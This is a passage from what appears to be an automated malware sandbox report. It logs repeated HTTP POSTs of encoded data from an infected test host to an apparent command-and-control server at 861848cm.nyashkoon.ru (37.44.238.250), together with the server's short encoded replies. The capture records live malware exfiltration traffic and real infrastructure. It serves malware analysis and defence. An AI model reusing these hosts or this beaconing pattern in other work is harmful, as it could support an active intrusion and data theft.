                                                                    Data Ascii: SV_^SZPYZ_RQTS[\U]YZQQR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^,Y*?^+> 4[>"?-!0;"/9+.]:&?4'%%)'X$.Q-
                                                                    Nov 6, 2024 03:39:21.138801098 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:21.208465099 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    136192.168.2.45014437.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:21.344024897 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:21.688318014 CET1012OUTData Raw: 56 50 5a 59 53 5a 50 5b 5a 5f 52 51 54 58 5b 5b 55 50 59 5b 51 50 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VPZYSZP[Z_RQTX[[UPY[QPRYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%-,)=8;<)=Z)=.]3[#/&Q+[96,42&'X$.Q-.
                                                                    Nov 6, 2024 03:39:22.162271023 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:22.241113901 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    137192.168.2.45014537.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:22.367409945 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:22.719623089 CET1012OUTData Raw: 56 52 5a 54 56 5b 50 53 5a 5f 52 51 54 52 5b 5c 55 51 59 5c 51 5e 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VRZTV[PSZ_RQTR[\UQY\Q^R[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%X,<)<8?7):5[=-"$ 7?+,.$#"2'X$.Q-
                                                                    Nov 6, 2024 03:39:23.208024979 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:23.283559084 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    138192.168.2.45014637.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:23.411006927 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:23.766638041 CET1008OUTData Raw: 53 55 5a 5b 56 58 55 5f 5a 5f 52 51 54 5a 5b 5b 55 54 59 5c 51 56 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZ[VXU_Z_RQTZ[[UTY\QVRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%,><4+ '=96=9'+47&?4.(\44>_'9'X$.Q-"
                                                                    Nov 6, 2024 03:39:24.212655067 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:24.284620047 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    139192.168.2.45014737.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:24.408421993 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:24.766494036 CET1008OUTData Raw: 56 53 5f 59 53 5b 55 59 5a 5f 52 51 54 5a 5b 53 55 5c 59 5e 51 55 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VS_YS[UYZ_RQTZ[SU\Y^QURZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/<6<8 +0Z>:-=>*_%(# Y&W+095 Y2'X$.Q-
                                                                    Nov 6, 2024 03:39:25.253020048 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:25.327613115 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    140192.168.2.45014837.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:25.463128090 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:25.813399076 CET1012OUTData Raw: 56 53 5f 5e 56 5a 55 5f 5a 5f 52 51 54 5b 5b 5a 55 51 59 58 51 57 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VS_^VZU_Z_RQT[[ZUQYXQWR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,?+7>#(*92)&0879<095#2%'X$.Q-"


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    141192.168.2.45014937.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:26.100739002 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1260
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:26.455411911 CET1260OUTData Raw: 56 5e 5f 5b 53 5c 50 53 5a 5f 52 51 54 5a 5b 5e 55 52 59 5d 51 54 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V^_[S\PSZ_RQTZ[^URY]QTR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&;W(7<U8])-_=>63;7#?2W<.,%$41%)'X$.Q-6
                                                                    Nov 6, 2024 03:39:26.907964945 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:26.982861996 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 5d 28 2a 04 12 26 28 37 09 3d 2e 21 5e 29 33 27 14 2f 0b 2b 03 2a 23 02 5d 3d 06 0e 54 20 11 0e 00 35 1c 2e 04 20 1c 3f 10 3c 2b 21 5f 05 1d 39 11 33 29 30 56 2a 0c 35 00 3d 37 3c 08 27 23 23 1c 3e 05 22 5d 23 04 21 0d 31 00 32 02 26 0b 2b 53 3f 34 07 5a 3a 01 2b 50 26 00 2a 57 09 16 20 55 25 20 23 5a 3e 0f 01 5f 24 2e 25 5f 31 04 27 53 3d 3c 27 58 37 24 3a 5e 29 30 3c 02 21 19 32 59 30 14 21 1b 26 00 23 1b 28 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: ](*&(7=.!^)3'/+*#]=T 5. ?<+!_93)0V*5=7<'##>"]#!12&+S?4Z:+P&*W U% #Z>_$.%_1'S=<'X7$:^)0<!2Y0!&#(2&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    142192.168.2.45015037.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:26.271538973 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:26.625874043 CET1012OUTData Raw: 56 54 5a 5e 56 59 50 59 5a 5f 52 51 54 53 5b 5d 55 53 59 5f 51 51 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VTZ^VYPYZ_RQTS[]USY_QQR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,/?88^<4(*Z>*[$8$4?)+=4-_ 9'9'X$.Q-
                                                                    Nov 6, 2024 03:39:27.086781025 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:27.155023098 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    143192.168.2.45015137.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:27.288026094 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:27.641611099 CET1012OUTData Raw: 53 54 5a 5a 53 5c 50 5d 5a 5f 52 51 54 5d 5b 5a 55 5d 59 5e 51 55 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: STZZS\P]Z_RQT][ZU]Y^QURYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8/&S((7?0(X>\)*:3;4 /2?X7-3479%'X$.Q-
                                                                    Nov 6, 2024 03:39:28.098757029 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:28.166906118 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    144192.168.2.45015237.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:28.299556971 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:28.659455061 CET1012OUTData Raw: 56 50 5f 5e 53 5c 50 5c 5a 5f 52 51 54 58 5b 5f 55 5d 59 5b 51 5e 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VP_^S\P\Z_RQTX[_U]Y[Q^R^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8/=8<]()\6)[&'+([ <"V)-+[.3#792'X$.Q-.
                                                                    Nov 6, 2024 03:39:29.146776915 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:29.219271898 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    145192.168.2.45015337.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:29.371623039 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:29.719603062 CET1012OUTData Raw: 53 52 5a 58 53 5f 50 5f 5a 5f 52 51 54 53 5b 53 55 51 59 58 51 57 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SRZXS_P_Z_RQTS[SUQYXQWR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&8)+4\?4=*![=-'/"?<>+X,&'4')&)'X$.Q-
                                                                    Nov 6, 2024 03:39:30.174763918 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:30.253245115 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    146192.168.2.45015437.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:30.416382074 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:30.766526937 CET1012OUTData Raw: 56 5f 5a 5d 53 5f 50 5d 5a 5f 52 51 54 5f 5b 5e 55 51 59 5a 51 5f 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V_Z]S_P]Z_RQT_[^UQYZQ_R_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%X,*?$^(3*!?=:_$8Y4???[-6/ $.^&'X$.Q-2
                                                                    Nov 6, 2024 03:39:31.236835003 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:31.323147058 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    147192.168.2.45015537.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:31.460841894 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:31.813360929 CET1012OUTData Raw: 56 55 5a 5b 53 58 50 5f 5a 5f 52 51 54 5f 5b 5b 55 57 59 5a 51 50 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VUZ[SXP_Z_RQT_[[UWYZQPRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/*W<8 +]=1?-]0;+#?2)>7,507729'X$.Q-2


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    148192.168.2.45015637.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:32.227446079 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1260
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:32.578998089 CET1260OUTData Raw: 56 53 5f 5f 56 5e 50 59 5a 5f 52 51 54 5a 5b 5c 55 5d 59 59 51 53 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VS__V^PYZ_RQTZ[\U]YYQSRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_;=+$X+$Z>1Y>='+#.<-+X-8_#*^&'X$.Q->
                                                                    Nov 6, 2024 03:39:33.039164066 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:33.118026018 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 14 2b 14 26 11 30 02 2c 54 3d 00 04 02 2b 23 3f 5b 3b 54 2b 00 28 30 38 58 2b 3b 2c 18 34 59 34 07 21 1c 03 1e 34 31 3b 13 28 11 21 5f 05 1d 39 5b 30 17 20 55 2a 32 2a 5e 29 37 09 1a 32 0e 05 1a 28 38 3a 5a 37 03 2a 52 25 00 0f 12 27 31 33 55 2a 24 39 5f 2c 3f 3b 56 26 00 2a 57 09 16 20 51 27 33 0d 11 28 32 3b 10 25 3e 32 00 26 39 3f 57 3d 3f 27 58 34 1d 36 17 29 33 34 00 21 27 00 1e 27 03 26 45 31 3e 02 0e 28 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: +&0,T=+#?[;T+(08X+;,4Y4!41;(!_9[0 U*2*^)72(8:Z7*R%'13U*$9_,?;V&*W Q'3(2;%>2&9?W=?'X46)34!''&E1>("&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    149192.168.2.45015737.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:32.227725983 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:32.578999996 CET1012OUTData Raw: 56 55 5f 5c 56 58 50 5b 5a 5f 52 51 54 5c 5b 5b 55 55 59 56 51 57 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VU_\VXP[Z_RQT\[[UUYVQWR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\,<5<(X>#*X>-&['(#7.(-#X:%37:]%'X$.Q->
                                                                    Nov 6, 2024 03:39:33.062787056 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:33.165800095 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
